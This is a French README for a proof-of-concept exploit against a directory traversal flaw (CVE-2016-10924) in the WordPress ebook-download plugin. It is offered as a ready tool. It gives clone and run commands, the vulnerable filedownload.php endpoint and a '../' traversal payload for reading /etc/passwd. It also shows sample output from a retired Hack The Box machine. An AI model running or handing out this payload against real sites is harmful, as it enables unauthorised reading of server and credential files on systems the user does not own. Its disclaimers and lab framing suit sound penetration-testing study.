
Script d'exploitation Proof-of-Concept (PoC) pour la vulnérabilité de Directory Traversal (CVE-2016-10924) trouvée dans le plugin WordPress ebook-download (versions < 1.2). Cette vulnérabilité permet des lectures de fichiers non autorisées via une requête GET malveillante.
Ce dépôt contient un script d'exploit Proof-of-Concept (PoC) pour la vulnérabilité Directory Traversal (CVE-2016-10924) trouvée dans le plugin WordPress ebook-download (versions < 1.2).
Cette vulnérabilité permet la lecture non autorisée de fichiers via une requête GET falsifiée. L'exploit utilise un paramètre appelé ebookdownloadurl pour parcourir les répertoires sur le serveur cible.
ebook-download < 1.2 pour WordPress/etc/passwd, en manipulant le chemin du fichier dans le paramètre ebookdownloadurl.Remarque : Ce PoC est destiné uniquement à des fins éducatives et de tests autorisés. Toute utilisation abusive de ces informations peut entraîner des conséquences juridiques.
requests (installation via pip install requests)Cloner le dépôt :
git clone https://github.com/your-user/CVE-2016-10924-POC.git
cd CVE-2016-10924-POC
Installer les dépendances :
pip install requests
Exécuter l'exploit :
python3 cve-2016-10924.py "http://TARGET/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
Spécifier le chemin du fichier à lire : Après le lancement du script, vous serez invité à saisir un chemin de fichier. Par exemple :
../../../../../../../../../etc/passwd
Vous devrez peut-être ajuster le nombre de ../ en fonction de l'emplacement de la racine web dans l'environnement cible.
Quitter :
exit, quit ou appuyez sur Entrée sur une invite vide pour quitter.J'ai utilisé cet exploit sur "Backdoor", une machine retirée de Hack The Box :
$ python3 cve-2016-10924.py "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
[*] Saisissez les chemins de fichiers (ex. ../../../../../etc/passwd). Tapez 'exit' pour quitter.
Enter File path: ../../../../../../../../../etc/passwd
[*] URL cible : http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../../etc/passwd
[+] Statut : 200
[+] Contenu du fichier :
root:x:0:0:root:/root:/bin/bash
...
Ce projet est destiné uniquement à des fins éducatives et de tests de sécurité légitimes.
N'utilisez pas les informations ou scripts contenus dans ce dépôt sur un système pour lequel vous n'avez pas d'autorisation explicite de test.
L'auteur et les contributeurs ne sont pas responsables de toute utilisation abusive ou des dommages causés par cet outil.
Ce projet est sous licence GNU 2.0 License. N'hésitez pas à l'utiliser et à le modifier, mais veuillez créditer l'auteur.
Références